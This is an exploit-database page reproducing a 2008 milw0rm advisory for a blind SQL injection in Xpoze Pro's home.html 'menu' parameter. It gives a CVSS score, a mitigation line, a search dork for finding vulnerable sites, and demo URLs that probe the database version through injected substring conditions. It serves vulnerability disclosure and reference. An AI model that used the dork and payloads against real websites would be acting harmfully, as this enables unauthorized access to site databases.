header-logo
Suggest Exploit
vendor:
Xpoze Pro
by:
XaDoS (SecurityCode Team)
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Xpoze Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Xpoze Pro (home menù) <= Blind $ql Injection

Xpoze Pro is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by using a malicious SQL query in the 'menu' parameter of the 'home.html' page. The malicious query can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed.
Source

Exploit-DB raw data:

[■]  Xpoze Pro  (home menù) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[â– ] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[■] D£M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 

 
[â– ] Th4nKs::
 
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )

# milw0rm.com [2008-12-12]